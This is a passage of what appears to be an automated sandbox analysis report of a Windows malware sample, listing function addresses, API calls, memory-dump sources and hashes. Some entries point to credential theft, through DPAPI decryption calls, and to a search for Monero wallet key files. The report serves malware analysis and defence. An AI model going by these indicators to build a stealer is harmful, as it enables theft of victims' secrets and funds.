                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 8dd04171a645edd78067f805af3518b8f5e0866e0d2b3a5699f94d8a8ce3a501
                                        • Instruction ID: 59cc04cb4f9f04526a0b8aedca64dfdc8e2f2e097908159f51075cea7a5f003c
                                        • Opcode Fuzzy Hash: 8dd04171a645edd78067f805af3518b8f5e0866e0d2b3a5699f94d8a8ce3a501
                                        • Instruction Fuzzy Hash: 13113CB2904118ABDB14DFC9DD45BBEB7F8FB4CB11F10411AF605A2280E3395940C7B5
                                        Function 00A57A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0160E650,00000000,?,00A60E10,00000000,?,00000000,00000000), ref: 00A57A63
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57A6A
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0160E650,00000000,?,00A60E10,00000000,?,00000000,00000000,?), ref: 00A57A7D
                                        • wsprintfA.USER32 ref: 00A57AB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: 50023a4687410635e2e1584abe30d7f7495f23e4226f2b0a6d9a7ad70d03854e
                                        • Instruction ID: ccc7567bbb6f2d029eda7cd5c83f30e5112129d8976dbfe3fae9121273b360e2
                                        • Opcode Fuzzy Hash: 50023a4687410635e2e1584abe30d7f7495f23e4226f2b0a6d9a7ad70d03854e
                                        • Instruction Fuzzy Hash: 58118EB1945218EBEB208B54DC49FAEB778FB04761F10479AEA0AA32C0D7741A44CF51
                                        Function 00DFC97F Relevance: 4.8, Strings: 3, Instructions: 1056COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 9V=a$t}?$yWz
                                        • API String ID: 0-76977012
                                        • Opcode ID: cd24d14522d8311e3a83427a951ca56fba4fb79b393b2d78eb1e6a8239b1e122
                                        • Instruction ID: 71af7ed1bb5dd5c466bbf16eb85c535fa6ad20e0073ffa67da62b69b61b931fb
                                        • Opcode Fuzzy Hash: cd24d14522d8311e3a83427a951ca56fba4fb79b393b2d78eb1e6a8239b1e122
                                        • Instruction Fuzzy Hash: 856208F360C2009FE304AE2DEC8567AB7E9EFD8720F2A893DE6C5C3744E53558058656
                                        Function 00A53720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(00A5E118,00000000,00000001,00A5E108,00000000), ref: 00A53758
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A537B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: e18ec171334c04c7827a5cf999a9c0d6c4cf4d87570e1f37554b1790f49fdef2
                                        • Instruction ID: bcc8444b510dae85deb159bc58e84df0a7daa0faa1d2c658ff197ed99052a40b
                                        • Opcode Fuzzy Hash: e18ec171334c04c7827a5cf999a9c0d6c4cf4d87570e1f37554b1790f49fdef2
                                        • Instruction Fuzzy Hash: 9141E971A40A28AFDB24DF58CC95B9BB7B5BB48702F4041D8E609E72D0E7716E85CF50
                                        Function 00A49B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A49B84
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A49BA3
                                        • LocalFree.KERNEL32(?), ref: 00A49BD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 93afc4aad427f9a370746f52256d533bea966755ba47dedffb4f0279abc38759
                                        • Instruction ID: b8f0be07de1cd5a65a777e1bc50e8eb37d61c98dc53c8b3ab0bb934e90e9e274
                                        • Opcode Fuzzy Hash: 93afc4aad427f9a370746f52256d533bea966755ba47dedffb4f0279abc38759
                                        • Instruction Fuzzy Hash: F311C9B8A00209EFDB04DF94D985AAFB7B5FF88300F104599E915A7390D774AE11CFA1
                                        Function 00E1392C Relevance: 4.2, Strings: 2, Instructions: 1659COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: PDGn$c3o?
                                        • API String ID: 0-3844238503
                                        • Opcode ID: 02ac5959c52356f7076f0a8e49d9f4830c715d86e11d2d7a249ac9ae3888eb9b
                                        • Instruction ID: d198807cfd21619bb578499f2282bfd8c8374c693224e1f449d391eb3f21c91f
                                        • Opcode Fuzzy Hash: 02ac5959c52356f7076f0a8e49d9f4830c715d86e11d2d7a249ac9ae3888eb9b
                                        • Instruction Fuzzy Hash: B4B22AF3A0C2109FE7046E2DEC8567ABBE9EFD4320F16863DE6C4C7744EA7558058692
                                        Function 00E82821 Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !($v~_$z~_
                                        • API String ID: 0-4077138999
                                        • Opcode ID: b557b6124bbd5382e9eef85390224a63dde7f5ffc2d26d4e1992e4c2a7a42e75
                                        • Instruction ID: 0ea9ce734a851b36d99c8e720ab119a0c7f63bcff7aa9affb4c4eff990378368
                                        • Opcode Fuzzy Hash: b557b6124bbd5382e9eef85390224a63dde7f5ffc2d26d4e1992e4c2a7a42e75
                                        • Instruction Fuzzy Hash: 6F5125B390C205DFD3147E69DD846BABBE8EB54350F22192EEBCEE3600E1315940A792
                                        Function 00E02D44 Relevance: 2.8, Strings: 1, Instructions: 1589COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ,}}
                                        • API String ID: 0-2922230984
                                        • Opcode ID: 6cd6c39eeb50ffa9e5b2d0ed03b6ef16cd0d2197432c6caa98f8a46f51a1f28f
                                        • Instruction ID: e6c60cd28b756deb40b51862157e75621c3647a4dd04dd5fd20c529c6cd5367e
                                        • Opcode Fuzzy Hash: 6cd6c39eeb50ffa9e5b2d0ed03b6ef16cd0d2197432c6caa98f8a46f51a1f28f
                                        • Instruction Fuzzy Hash: AEB2F5F390C2049FE704AE29EC8567AFBE9EF94720F16493DEAC4C3744EA3558058697
                                        Function 00CBDE33 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: a(s$iA2
                                        • API String ID: 0-3445831206
                                        • Opcode ID: 07c1ea00a0218e275095ea957a1a1923464d06fec298da156b5b74eb30df44a3
                                        • Instruction ID: 9fad95305a8b307171e641802e25a6b6dec11cde4d4ee0b07c378fc778c710e6
                                        • Opcode Fuzzy Hash: 07c1ea00a0218e275095ea957a1a1923464d06fec298da156b5b74eb30df44a3
                                        • Instruction Fuzzy Hash: 3C5109F361C3085FE308AA2DEC9573AB7D9DBD4720F26463DE694C3780ED7558018696
                                        Function 00A4F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A615B8,00A60D96), ref: 00A4F71E
                                        • StrCmpCA.SHLWAPI(?,00A615BC), ref: 00A4F76F
                                        • StrCmpCA.SHLWAPI(?,00A615C0), ref: 00A4F785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4FAB1
                                        • FindClose.KERNEL32(000000FF), ref: 00A4FAC3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 287d54da532f8c175ae5f7ae350c3433c37a2fea607e7de294792f38c7b8040f
                                        • Instruction ID: a462417113606a3e9f3343561dade0bdb99989108127edb309d1c19705bfce45
                                        • Opcode Fuzzy Hash: 287d54da532f8c175ae5f7ae350c3433c37a2fea607e7de294792f38c7b8040f
                                        • Instruction Fuzzy Hash: 7E118475A0411DABDB14EBA0DD559ED7378BF20301F4047A9A91A57092EF302B4ECB92
                                        Function 00D60608 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: u}|
                                        • API String ID: 0-2745768974
                                        • Opcode ID: 61bf4fe0559e233b213ef3f540da83ef8279005aff5fe1e52420c18e4e10b284
                                        • Instruction ID: 9402c5a121c14013cf7178ab539b76d3c54038c36275ce6861b7516cc8ed0dbf
                                        • Opcode Fuzzy Hash: 61bf4fe0559e233b213ef3f540da83ef8279005aff5fe1e52420c18e4e10b284
                                        • Instruction Fuzzy Hash: 4541D0B3B083005FF314AA7DDC99B3AB6D6DBC4320F2A853DAB94C7785F97948054686
                                        Function 00D4D4CF Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
